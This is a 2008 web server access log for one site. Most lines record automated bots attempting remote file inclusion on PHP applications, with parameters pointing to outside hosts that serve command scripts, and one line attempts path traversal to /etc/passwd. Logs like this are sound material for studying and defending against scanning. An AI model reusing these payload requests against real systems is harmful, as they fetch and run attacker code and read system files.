89.108.93.123 - - [04/May/2008:10:05:07 -0700] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
89.108.93.123 - - [04/May/2008:10:05:08 -0700] "GET /logs/wamp_dir/setup/yesno.phtml?no_url=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:05:11 -0700] "GET /logs/show.php?page=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:05:11 -0700] "GET /show.php?page=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:05:12 -0700] "GET /logs/show.php?page=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:05:13 -0700] "GET /show.php?page=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:05:18 -0700] "GET /logs/index1.php?menu=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:05:18 -0700] "GET /index1.php?menu=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:10:05:20 -0700] "GET /logs/index1.php?menu=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:10:05:20 -0700] "GET /index1.php?menu=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.221.130.3 - - [04/May/2008:10:05:24 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [04/May/2008:10:05:24 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.21.155 - - [04/May/2008:10:05:27 -0700] "GET /megumi/Necklace?D=A HTTP/1.0" 301 88 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.155 - - [04/May/2008:10:05:27 -0700] "GET /megumi/Necklace/?D=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:05:37 -0700] "GET /logs/index1.php?menu=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.26.118 - - [04/May/2008:10:05:38 -0700] "GET /index1.php?menu=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:06:21 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:06:22 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:06:49 -0700] "GET /logs/access_080309.log//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.103.159.159 - - [04/May/2008:10:06:49 -0700] "GET /DORK:http://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:07:00 -0700] "GET /logs/index1.php?choix=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:07:01 -0700] "GET /index1.php?choix=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:07:06 -0700] "GET /logs/index1.php?menu=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:07:07 -0700] "GET /index1.php?menu=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:07:07 -0700] "GET /logs/access_080315.log//templates/mangobery/footer.sample.php?Site_Path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:07:08 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:07:25 -0700] "GET /logs/access_080309.log//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:07:42 -0700] "GET /logs/access_080311.log//agendax/addevent.inc.php?agendax_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:07:43 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:07:43 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:07:44 -0700] "GET /logs/access_080113.log//templates/mangobery/footer.sample.php?Site_Path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:08:02 -0700] "GET /logs/show.php?page=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:08:03 -0700] "GET /show.php?page=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:08:51 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.255.3.68 - - [04/May/2008:10:09:02 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cgd-k25.org/forum//includes/error/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.34.78.106 - - [04/May/2008:10:09:03 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [04/May/2008:10:09:03 -0700] "GET /phphtml.php?htmlclass_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [04/May/2008:10:09:04 -0700] "GET /logs/phphtml.php?htmlclass_path=http://edgcs.com/store/administrator/components/com_jcs/views/safe.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [04/May/2008:10:09:10 -0700] "GET /logs/access_071225.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.11.23 - - [04/May/2008:10:09:24 -0700] "GET /logs/access_080218.log//spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.209.100 - - [04/May/2008:10:09:32 -0700] "GET /logs/access_080218.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.209.100 - - [04/May/2008:10:09:33 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.209.100 - - [04/May/2008:10:09:33 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.103.159.159 - - [04/May/2008:10:09:35 -0700] "GET /logs/access_080228.log/DORK:http://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.103.159.159 - - [04/May/2008:10:09:35 -0700] "GET /logs/DORK:http://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:10:09:53 -0700] "GET /logs/access_080315.log//templates/mangobery/footer.sample.php?Site_Path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.103.159.159 - - [04/May/2008:10:10:09 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.103.159.159 - - [04/May/2008:10:10:09 -0700] "GET /phphtml.php?htmlclass_path=http://www.hotsalsazone.com/images/gallery/test.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.22.150.131 - - [04/May/2008:10:10:11 -0700] "GET /logs/access_071225.log/index1.php?p=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:10:10:16 -0700] "GET /logs/access_080113.log//templates/mangobery/footer.sample.php?Site_Path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.40.71.237 - - [04/May/2008:10:10:20 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
196.40.71.237 - - [04/May/2008:10:10:21 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
222.255.3.68 - - [04/May/2008:10:11:26 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.cgd-k25.org/forum//includes/error/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.48.10.14 - - [04/May/2008:10:11:34 -0700] "GET /logs/access_071224.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.19thgreen-bb.com/cache/%20/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:12:01 -0700] "GET /logs//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 45988 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:12:06 -0700] "GET //?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
91.197.231.29 - - [04/May/2008:10:12:44 -0700] "GET //include.php?path[docroot]=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:10:12:59 -0700] "GET /logs/access_080312.log//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:10:12:59 -0700] "GET /logs/access_080312.log//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.179.0.195 - - [04/May/2008:10:13:48 -0700] "GET /logs/access_080315.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
89.108.67.192 - - [04/May/2008:10:13:53 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [04/May/2008:10:13:54 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [04/May/2008:10:13:54 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:14:03 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:14:03 -0700] "GET //skin/zero_vote/error.php?dir=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:14:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:14:04 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:14:04 -0700] "GET //skin/zero_vote/error.php?dir=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:14:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.20.46.121 - - [04/May/2008:10:14:37 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/jamesbrown/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [04/May/2008:10:14:37 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/jamesbrown/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [04/May/2008:10:14:37 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/jamesbrown/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:14:39 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [04/May/2008:10:14:39 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://yogyafree.net/files/arab.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:14:55 -0700] "GET /logs//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 45988 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:15:02 -0700] "GET //?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:10:15:09 -0700] "GET /logs/access_080309.log//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:10:15:11 -0700] "GET /logs/access_080309.log//?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.20.46.121 - - [04/May/2008:10:15:16 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/jamesbrown/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:15:34 -0700] "GET /logs/access_080312.log//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:15:35 -0700] "GET //skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:15:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.233.79.202 - - [04/May/2008:10:15:50 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?http://www.handowire.com/board/mic22_mod.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.46.234 - - [04/May/2008:10:15:57 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.19.158.41 - - [04/May/2008:10:16:25 -0700] "GET /logs//index1.php?choix=http://www.deadword.we.bs/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [04/May/2008:10:16:26 -0700] "GET //index1.php?choix=http://www.deadword.we.bs/cmd?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.46.234 - - [04/May/2008:10:16:52 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.70.204.99 - - [04/May/2008:10:17:24 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [04/May/2008:10:17:24 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [04/May/2008:10:17:25 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cyos.co.kr/bbs/data1/adult?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:17:31 -0700] "GET /logs/access_071024.log/index.php?seite=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:17:36 -0700] "GET /index.php?seite=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:17:36 -0700] "GET /logs/index.php?seite=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:17:39 -0700] "GET /logs/access_071024.log/index.php?seite=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:17:44 -0700] "GET /index.php?seite=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:10:17:45 -0700] "GET /logs/index.php?seite=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:17:55 -0700] "GET /logs/access_080312.log//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:17:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [04/May/2008:10:18:04 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [04/May/2008:10:18:13 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [04/May/2008:10:18:13 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.195.37.115 - - [04/May/2008:10:18:38 -0700] "GET /logs/access.log HTTP/1.0" 200 169922 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:10:19:05 -0700] "GET /logs/index.php?Load=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:10:19:09 -0700] "GET /index.php?Load=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:19:11 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [04/May/2008:10:19:15 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:10:19:15 -0700] "GET /logs/include/write.php?dir=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.175.248.213 - - [04/May/2008:10:19:16 -0700] "GET /include/write.php?dir=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.192 - - [04/May/2008:10:20:10 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [04/May/2008:10:20:10 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:20:30 -0700] "GET /logs/access_080309.log//include.php?path[docroot]=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:20:30 -0700] "GET //include.php?path[docroot]=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:20:31 -0700] "GET /logs//include.php?path[docroot]=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:21:10 -0700] "GET /logs/access_080309.log//include.php?path[docroot]=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:21:10 -0700] "GET //include.php?path[docroot]=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:21:10 -0700] "GET /logs//include.php?path[docroot]=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.138.13 - - [04/May/2008:10:21:11 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:21:25 -0700] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:21:26 -0700] "GET /logs//?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 200 45988 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [04/May/2008:10:21:27 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.94.128.57 - - [04/May/2008:10:21:41 -0700] "GET /logs/access_080309.log//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:10:21:51 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://fadhilla.com/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:22:07 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:22:08 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.130 - - [04/May/2008:10:22:09 -0700] "GET /logs/access_080315.log//atom.php5?page=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.146.251.123 - - [04/May/2008:10:22:12 -0700] "GET /logs/access_080309.log//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:10:22:14 -0700] "GET /logs/access_080215.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
